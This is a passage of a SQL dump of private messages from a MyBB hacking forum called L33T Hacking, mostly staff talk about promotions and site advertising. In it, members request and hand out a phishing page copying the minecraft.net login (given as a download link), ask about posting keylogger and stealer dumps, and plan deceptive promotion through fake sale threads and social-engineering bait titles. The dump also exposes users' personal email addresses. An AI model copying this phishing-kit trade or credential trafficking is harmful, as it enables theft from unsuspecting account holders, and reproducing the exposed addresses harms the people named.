a gaming section Id love to manage that. But yeah I guess just keep it in mind, Id love to help out.', '1345242730', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('213', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help Needed', '0', '[quote=\'t3h jok3r\']\r\nOK, it\'s awkward that an Admin is asking their members for help but you asked if you can get promoted and you could help us out.\r\n\r\nI was wondering if you can help me out with a small task, if it works out then you would get a chance. \r\n[/quote]\r\n\r\nsure, with what?', '1345247118', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('218', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help Needed', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nOK, it\'s awkward that an Admin is asking their members for help but you asked if you can get promoted and you could help us out.\r\n\r\nI was wondering if you can help me out with a small task, if it works out then you would get a chance. \r\n[/quote]\r\n\r\nsure, with what?\r\n[/quote]\r\n\r\nI wanted to know if you were interesting in posting latest news including hackernews.\r\n\r\nWe have a news and happening forum and if we post the latest news then people will do a research about it and if we are the first one to post about it then they will join our site to discuss etc. Also copy and paste news from thehackernews.com and since you can make guest comments on thehackernews, you can tell people to sign up at LH to discuss more etc. \r\n[/quote]\r\n\r\nSure id love to', '1345247606', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('225', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help', '0', 'Nice idea I might give it a shot.[quote=\'t3h jok3r\']\r\nYo sup man. I needed your help, I found some good website advertising techniques and some just came up on my mind.\r\n\r\nI really needed your help, if you can help me with this then I swear to god we will be getting active members from HF and other sites easily plus quick.\r\n\r\nWhat I need you to do is go on sites that are related to webmastering and create a fake thread saying you are the owner of L33THACKING.com and you are selling it. From this we will get some backlinks and shit loads of website views and it will so-call be advertising our site.\r\n\r\nSecond, It doesn\'t matter if you don\'t want to do this or not but it\'s a good trick.\r\n\r\nEdit your custom title and put \"want to learn Social Engineering? PM me\" or \"PM me to learn how to Social Engineer for free\"\r\n\r\nThen when they do PM you, just give them a link to LH and say you can learn SEing plus get free PIDs from LH. \r\n[/quote]', '1345268355', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('242', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'News', '0', 'I guess no one liked my news post :(\r\n\r\nIll find something new and post it though.', '1345332716', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('252', '67', '64', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"64\";}}', '2', 'Free Phishing Theme', '0', 'Website: http://www.minecraft.net/login\r\nEmail: kristoffergo1@hotmail.com', '1345408668', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('256', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: News', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nI guess no one liked my news post :(\r\n\r\nIll find something new and post it though.\r\n[/quote]\r\n\r\nThanks and sorry for the inconvience. I wasn\'t really online much yesterday so didn\'t get a chance to look through. I would say Yahoo news is something you should concentrate on the most. Thanks for helping me out. \r\n[/quote]\r\n\r\nIf you want me to post any interesting news that\'s fine. I can do that', '1345416730', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('260', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: News', '0', 'Alright, well Iv been thinking about posting something of world news daily and than a Hacking news story once A week. ', '1345418101', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('263', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: News', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nAlright, well Iv been thinking about posting something of world news daily and than a Hacking news story once A week. \r\n[/quote]\r\n\r\nSo you would be posting one article a week? \r\n[/quote]\r\n\r\nWorld news daily, Hacker news weekly', '1345420557', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('266', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: News', '0', 'I was going to upload some other hacking tools I made but they got erased from media fire ahha, damn I wanted that award.. I better get coding.', '1345421202', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('277', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Reborn', '0', '[quote=\'t3h jok3r\']\r\nI demoted reborn. Don\'t take me wrong, but he said he is running his own website so he is busy. Also I added a lot of funds on my PP and bought a sticky and banner ad on the profithers. It\'s a site with good trafficking anyways, what\'s your PP ID?\r\n[/quote]\r\nKk good hopefully we get people. Also moneymachine3214@gmail.com', '1345476523', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('287', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Moderator', '0', '[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nI would like to know if you are interested in being a sectional Moderator. We currently demoted Sin Cara and we are in need of a Mod. \r\n[/quote]\r\n\r\nI would love it <3', '1345499370', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('288', '67', '67', '64', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Free Phishing Theme', '0', '[quote=\'HoverCatz\']\r\nWebsite: http://www.minecraft.net/login\r\nEmail: kristoffergo1@hotmail.com\r\n[/quote]\r\nHere you go sir:\r\n\r\nhttps://dl.dropbox.com/u/20731986/www.minecraft.net.rar\r\n\r\nlogin.html is your phishing page. If everything goes wrong, kindly pm me back and i\'ll help you out. Cheers', '1345502430', '0', '1', '0', '0', '0', '2', '1345551114'); INSERT INTO mybb_privatemessages VALUES('289', '64', '67', '64', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Free Phishing Theme', '0', '[quote=\'HoverCatz\']\r\nWebsite: http://www.minecraft.net/login\r\nEmail: kristoffergo1@hotmail.com\r\n[/quote]\r\nHere you go sir:\r\n\r\nhttps://dl.dropbox.com/u/20731986/www.minecraft.net.rar\r\n\r\nlogin.html is your phishing page. If everything goes wrong, kindly pm me back and i\'ll help you out. Cheers', '1345502430', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('292', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', '[quote=\'t3h jok3r\']\r\nCan you view the images in the thread below?\r\n\r\nhttp://l33thacking.com/showthread.php?tid=115\r\n[/quote]\r\n\r\nYes I can', '1345504064', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('295', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', 'Amazing aha. I\'m going to do my best being in this position.', '1345504203', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('298', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nAmazing aha. I\'m going to do my best being in this position.\r\n[/quote]\r\n\r\nThanks and good luck. Also thanks for the recommendation to your friend. \r\n[/quote]\r\n\r\nNo problem, rixxon is a very HQ person and I think he will bring alot to the table.', '1345504434', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('300', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Quick Question', '0', 'What section am I going to be moderating by the way?', '1345504540', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('304', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', 'Okay, Thank you.', '1345504828', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('307', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nOkay, Thank you.\r\n[/quote]\r\n\r\nNo problem, could you like our FB page or follow us on Twitter?\r\n\r\nhttps://www.facebook.com/L33tHacking\r\nhttp://twitter.com/l33thackingcom\r\n[/quote]\r\n\r\nDone, Making a youtube video right now. I have a couple friends with alot of sub\'s 1k+ and my channel\'s video range from like 200-700 views each vid so ima advertise a bit.', '1345505190', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('310', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Question', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nOkay, Thank you.\r\n[/quote]\r\n\r\nNo problem, could you like our FB page or follow us on Twitter?\r\n\r\nhttps://www.facebook.com/L33tHacking\r\nhttp://twitter.com/l33thackingcom\r\n[/quote]\r\n\r\nDone, Making a youtube video right now. I have a couple friends with alot of sub\'s 1k+ and my channel\'s video range from like 200-700 views each vid so ima advertise a bit.\r\n[/quote]\r\nThat\'s a good idea. Actually you would be the first one to get the YouTube award. \r\n[/quote]\r\n\r\nI made us a video, It\'s short but meh Hopefully people will see it.\r\nhttp://www.youtube.com/watch?v=Qd7bBe43ZE4&feature=youtu.be', '1345510745', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('314', '84', '1', '84', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Welcome to L33T Hacking!', '0', '[quote=\'t3h jok3r\']\r\nWelcome to our forum Thunder™.\r\n\r\nI am the founder of this site, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.com/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.com/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.com\r\n[/quote]\r\n\r\nCan i get free upgrade i am from profiters', '1345524902', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('326', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'You have been granted an award.', '0', 'You have been granted the [b]Elite[/b] award.', '1345557267', '0', '1', '0', '0', '0', '0', '1345601719'); INSERT INTO mybb_privatemessages VALUES('364', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgrade', '0', '[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nYou have active and HQ on LH ever since you have joined, if you would like I can provide you with a FREE upgrade to Elite.\r\n\r\n\r\n[/quote]\r\n\r\nId really appreciate that. Thanks soo much :) I will continue to contribute to this great forum. I<3youu^^\r\n\r\nLovely greetings sirchamp ', '1345562364', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('368', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Error', '0', 'Sorry, I forgot to add you to the additional groups so you weren\'t able to change your userbar. Now you are free to change your userbar to Coders and still be elite. ', '1345589339', '0', '1', '0', '1', '0', '0', '1345601704'); INSERT INTO mybb_privatemessages VALUES('371', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Fuck', '0', 'I locked myself out of my admin account.', '1345591481', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('377', '61', '10', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"10\";}}', '2', 'Re: Help', '0', '[quote=\'swa4567\']\r\nI posted my thread in the wrong forum. Can you please move it to the right section?\r\n\r\nhttp://l33thacking.com/showthread.php?tid=177\r\n[/quote]\r\n\r\nDone!', '1345594942', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('380', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Q', '0', '[quote=\'t3h jok3r\']\r\nShould I add a premium account section for upgraded members? People would find access to premium accounts such as upgraded accounts, pron etc. \r\n[/quote]\r\nYeah that would be nice.\r\n\r\n', '1345595671', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('383', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Q', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nShould I add a premium account section for upgraded members? People would find access to premium accounts such as upgraded accounts, pron etc. \r\n[/quote]\r\nYeah that would be nice.\r\n\r\n\r\n[/quote]\r\n\r\nDone. It\'s under the upgraded tab. \r\n[/quote]\r\nare Keylog dumbs allowed? well more like dumps from my old Istealer', '1345596269', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('390', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Q', '0', 'Okay.', '1345596957', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('401', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', '\"$$$Sharecash Moneymaking$$$\"', '0', 'http://www.mediafire.com/?70vz73teytzuana\r\nDo not give this \"direct\" link to anyone else. \r\n\r\n\r\nEnjoy', '1345648739', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('405', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Fuck', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nI locked myself out of my admin account.\r\n[/quote]\r\n\r\nWere you not able to pass through the l33thacking.com:80 popout or the admin login which requires the secret pin?\r\n[/quote]\r\nI remembered everything except my real Password.', '1345671215', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('410', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Fuck', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nI locked myself out of my admin account.\r\n[/quote]\r\n\r\nWere you not able to pass through the l33thacking.com:80 popout or the admin login which requires the secret pin?\r\n[/quote]\r\nI remembered everything except my real Password.\r\n[/quote]\r\n\r\nIf you don\'t remember your real password then how did you login to LH forums? \r\n[/quote]\r\nI do not log out... Also I remembered it just nor the correct variation unroll after 5 tries', '1345723760', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('413', '90', '1', '90', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: You have been granted an award.', '0', '[quote=\'t3h jok3r\']\r\nYou have been granted the [b]Golden Upload[/b] award.\r\n[/quote]\r\n\r\ncheers lol thanks', '1345737900', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('418', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'My thread', '0', 'Hey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]', '1345753521', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('419', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'RE: Skype IP Finder', '0', 'Hey I was using your Skype IP Finder.exe program\r\nAnd I got this error! :/\r\n\r\n\r\nError: Index was outside the bounds of the array.', '1345754088', '0', '3', '1345757256', '1', '0', '2', '1345757191'); INSERT INTO mybb_privatemessages VALUES('423', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? ', '1345756895', '0', '3', '1345757187', '1', '0', '0', '1345757164'); INSERT INTO mybb_privatemessages VALUES('425', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My thread', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? \r\n[/quote]\r\n\r\nOver 2800 minutes since i made it :p', '1345757187', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('427', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Skype IP Finder', '0', '[quote=\'iTzIpod\']\r\nHey I was using your Skype IP Finder.exe program\r\nAnd I got this error! :/\r\n\r\n\r\nError: Index was outside the bounds of the array.\r\n[/quote]\r\n\r\nYeah ik. I cant edit the tread to say that it doesnt work anymore. I asked Joker to do it, so hes gonna do it in a moment.\r\n\r\nThe error comes cuz the Api is down', '1345757256', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('428', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? \r\n[/quote]\r\n\r\nOver 2800 minutes since i made it :p\r\n[/quote]\r\n\r\nI thought there was no time limit for upgraded lol.\r\n\r\nAnyway, thanks for reporting. ', '1345757505', '0', '3', '1345817615', '1', '0', '0', '1345811450'); INSERT INTO mybb_privatemessages VALUES('430', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Youtube Video', '0', '[quote=\'iTzIpod\']\r\nHey can I download your Youtube video about L33t Hacking and then reupload it on mine? \r\n[/quote]\r\n\r\nNot if you\'re trying to get the youtube award.\r\n\r\nBut if you want to promote us than yes.', '1345757751', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('433', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Skype IP Finder', '0', '[quote=\'HoverCatz\']\r\n[quote=\'iTzIpod\']\r\nHey I was using your Skype IP Finder.exe program\r\nAnd I got this error! :/\r\n\r\n\r\nError: Index was outside the bounds of the array.\r\n[/quote]\r\n\r\nYeah ik. I cant edit the tread to say that it doesnt work anymore. I asked Joker to do it, so hes gonna do it in a moment.\r\n\r\nThe error comes cuz the Api is down\r\n[/quote]\r\n\r\n\r\nWhat is API? :/', '1345758307', '0', '3', '1345811280', '1', '0', '2', '1345811256'); INSERT INTO mybb_privatemessages VALUES('436', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Youtube Video', '0', '[quote=\'iTzIpod\']\r\n[quote=\'NXK\']\r\n[quote=\'iTzIpod\']\r\nHey can I download your Youtube video about L33t Hacking and then reupload it on mine? \r\n[/quote]\r\n\r\nNot if you\'re trying to get the youtube award.\r\n\r\nBut if you want to promote us than yes.\r\n[/quote]\r\nI don\'t need the Youtube Award. I just want to promote this site.\r\n[/quote]\r\n\r\nThan yeah it\'s fine.', '1345758676', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('441', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\']\r\nYou will now also be moderating the Forum Games sub-forum. \r\n[/quote]\r\n\r\nOuu this is good :)\r\n\r\nthis is good news my friend!', '1345767637', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('444', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nYou will now also be moderating the Forum Games sub-forum. \r\n[/quote]\r\n\r\nOuu this is good :)\r\n\r\nthis is good news my friend!\r\n[/quote]\r\n\r\nLol yeah but it\'s that more work for you? \r\n[/quote]\r\n\r\nNot at all. ', '1345768033', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('447', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nYou will now also be moderating the Forum Games sub-forum. \r\n[/quote]\r\n\r\nOuu this is good :)\r\n\r\nthis is good news my friend!\r\n[/quote]\r\n\r\nLol yeah but it\'s that more work for you? \r\n[/quote]\r\n\r\nNot at all. \r\n[/quote]\r\n\r\nCool. Got some work to do on LH so see you around. Also are you upgraded on HF and do you have a account on ubers?\r\n[/quote]\r\n\r\nYes I do.\r\nhttp://www.hackforums.net/member.php?action=profile&uid=590811', '1345768356', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('450', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nYou will now also be moderating the Forum Games sub-forum. \r\n[/quote]\r\n\r\nOuu this is good :)\r\n\r\nthis is good news my friend!\r\n[/quote]\r\n\r\nLol yeah but it\'s that more work for you? \r\n[/quote]\r\n\r\nNot at all. \r\n[/quote]\r\n\r\nCool. Got some work to do on LH so see you around. Also are you upgraded on HF and do you have a account on ubers?\r\n[/quote]\r\n\r\nYes I do.\r\nhttp://www.hackforums.net/member.php?action=profile&uid=590811\r\n[/quote]\r\n\r\nSeems like you like [s]Drums & Bass[/s] bums and boobs.\r\n\r\nBy the way, can you change your usertitle to something else? I mean I will give you something, it will help advertise LH. If you don\'t want to, trust me I don\'t mind at all. \r\n[/quote]\r\n\r\nSure I guess.', '1345770970', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('453', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nYou will now also be moderating the Forum Games sub-forum. \r\n[/quote]\r\n\r\nOuu this is good :)\r\n\r\nthis is good news my friend!\r\n[/quote]\r\n\r\nLol yeah but it\'s that more work for you? \r\n[/quote]\r\n\r\nNot at all. \r\n[/quote]\r\n\r\nCool. Got some work to do on LH so see you around. Also are you upgraded on HF and do you have a account on ubers?\r\n[/quote]\r\n\r\nYes I do.\r\nhttp://www.hackforums.net/member.php?action=profile&uid=590811\r\n[/quote]\r\n\r\nSeems like you like [s]Drums & Bass[/s] bums and boobs.\r\n\r\nBy the way, can you change your usertitle to something else? I mean I will give you something, it will help advertise LH. If you don\'t want to, trust me I don\'t mind at all. \r\n[/quote]\r\n\r\nSure I guess.\r\n[/quote]\r\n\r\nChange your usetitle to \"wana learn SEing? PM me.\" and when they do PM you, just refer them to LH. \r\n[/quote]\r\n\r\nAlright', '1345771235', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('462', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Request', '0', '[quote=\'t3h jok3r\']\r\nCan you make a thread somewhere except the marketplace saying you have a website with a coding section and you need some Java and VB.net experienced people to contribute on the website. In return you will provide them with a FREE lifetime upgrade. \r\n[/quote]\r\n\r\nI can\'t tonight. I am mobile with 10% battery life.\r\n\r\nSorry :(', '1345774872', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('464', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Fuck', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nI locked myself out of my admin account.\r\n[/quote]\r\n\r\nWere you not able to pass through the l33thacking.com:80 popout or the admin login which requires the secret pin?\r\n[/quote]\r\nI remembered everything except my real Password.\r\n[/quote]\r\n\r\nIf you don\'t remember your real password then how did you login to LH forums? \r\n[/quote]\r\nI do not log out... Also I remembered it just nor the correct variation unroll after 5 tries\r\n[/quote]\r\n\r\nSo you remembered your password? \r\n[/quote]\r\nYes', '1345782310', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('471', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Skype IP Finder', '0', '[quote=\'iTzIpod\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'iTzIpod\']\r\nHey I was using your Skype IP Finder.exe program\r\nAnd I got this error! :/\r\n\r\n\r\nError: Index was outside the bounds of the array.\r\n[/quote]\r\n\r\nYeah ik. I cant edit the tread to say that it doesnt work anymore. I asked Joker to do it, so hes gonna do it in a moment.\r\n\r\nThe error comes cuz the Api is down\r\n[/quote]\r\n\r\n\r\nWhat is API? :/\r\n[/quote]\r\n\r\nAn link that returns the Ip', '1345811280', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('472', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Skype IP Finder', '0', '[quote=\'HoverCatz\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'iTzIpod\']\r\nHey I was using your Skype IP Finder.exe program\r\nAnd I got this error! :/\r\n\r\n\r\nError: Index was outside the bounds of the array.\r\n[/quote]\r\n\r\nYeah ik. I cant edit the tread to say that it doesnt work anymore. I asked Joker to do it, so hes gonna do it in a moment.\r\n\r\nThe error comes cuz the Api is down\r\n[/quote]\r\n\r\n\r\nWhat is API? :/\r\n[/quote]\r\n\r\nAn link that returns the Ip\r\n[/quote]\r\n\r\nOh. So you can\'t fix it?\r\n:/ I really wanted it.', '1345813670', '0', '3', '1345816263', '1', '0', '2', '1345813798'); INSERT INTO mybb_privatemessages VALUES('478', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Skype IP Finder', '0', '[quote=\'iTzIpod\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'iTzIpod\']\r\nHey I was using your Skype IP Finder.exe program\r\nAnd I got this error! :/\r\n\r\n\r\nError: Index was outside the bounds of the array.\r\n[/quote]\r\n\r\nYeah ik. I cant edit the tread to say that it doesnt work anymore. I asked Joker to do it, so hes gonna do it in a moment.\r\n\r\nThe error comes cuz the Api is down\r\n[/quote]\r\n\r\n\r\nWhat is API? :/\r\n[/quote]\r\n\r\nAn link that returns the Ip\r\n[/quote]\r\n\r\nOh. So you can\'t fix it?\r\n:/ I really wanted it.\r\n[/quote]\r\n\r\nCant :( Only way is paying for an Api monthly. Costs like 5 monthly', '1345816263', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('492', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My thread', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip 